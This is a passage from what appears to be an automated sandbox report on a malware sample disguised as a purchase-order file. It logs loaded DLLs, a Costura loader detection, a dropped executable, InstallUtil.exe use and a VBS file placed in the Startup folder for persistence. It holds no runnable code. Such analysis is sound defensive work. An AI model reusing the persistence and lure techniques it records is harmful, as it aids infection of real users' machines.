                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.0000000004323000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.000000000449A000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507522952.00000000066C0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.0000000004323000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.000000000449A000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507522952.00000000066C0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: Repos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: IsNestedFamANDAssem.exe, 00000004.00000002.69719834098.0000000004D18000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: Repos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: IsNestedFamANDAssem.exe, 00000004.00000002.69719834098.0000000004D18000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 4.2.IsNestedFamANDAssem.exe.4883b08.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-12202432_ACD_Group.pif.exe.6590000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-12202432_ACD_Group.pif.exe.3b909a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.69484926490.00000000029C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.69719834098.0000000004883000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.69506645006.0000000006590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.69699448945.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.69496394260.0000000003928000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PO-12202432_ACD_Group.pif.exe PID: 4992, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: IsNestedFamANDAssem.exe PID: 1788, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_00E526C0 push esp; ret 0_2_00E526C9
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_0648ABEE push eax; iretd 0_2_0648AC45
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_0648ABE1 push es; retf 0_2_0648ABEC
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06480905 push esp; ret 0_2_0648090D
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_064E92E0 push eax; iretd 0_2_064E95B1
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_064E3290 push es; ret 0_2_064E3340
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_064E6B50 push 1C064CB3h; iretd 0_2_064E6BA5
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_064E8B10 push esp; retf 0_2_064E8D59
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_0658B636 pushfd ; retn 0000h0_2_0658B63B
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_0658AB65 push edi; iretd 0_2_0658AB66
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06582C9D push es; iretd 0_2_06582CC0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06582C96 push es; retf 0_2_06582C98
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06582D01 push es; ret 0_2_06582D1C
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06582D81 push es; iretd 0_2_06582D94
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A5ED0 push 00000006h; iretd 0_2_066A5EEC
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A2ABB pushad ; retf 0_2_066A2AC1
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A61A6 push ds; iretd 0_2_066A61A7
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06977C5B push E9E9906Ch; iretd 0_2_06977C60
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_013426BA push esp; ret 4_2_013426C9
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06B4ABEE push eax; iretd 4_2_06B4AC45
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06B40905 push esp; ret 4_2_06B4090D
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06BA3290 push es; ret 4_2_06BA3340
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06BA8B10 push esp; retf 4_2_06BA8D59
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C4B636 pushfd ; retn 0000h4_2_06C4B63B
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C4AB65 push edi; iretd 4_2_06C4AB66
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C42C95 push es; retf 4_2_06C42C98
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C42C29 push es; ret 4_2_06C42C74
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06C42D1D push es; iretd 4_2_06C42D80
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D7CF76 push es; iretd 4_2_06D7CF7C
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbsJump to dropped file
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbsJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbsJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
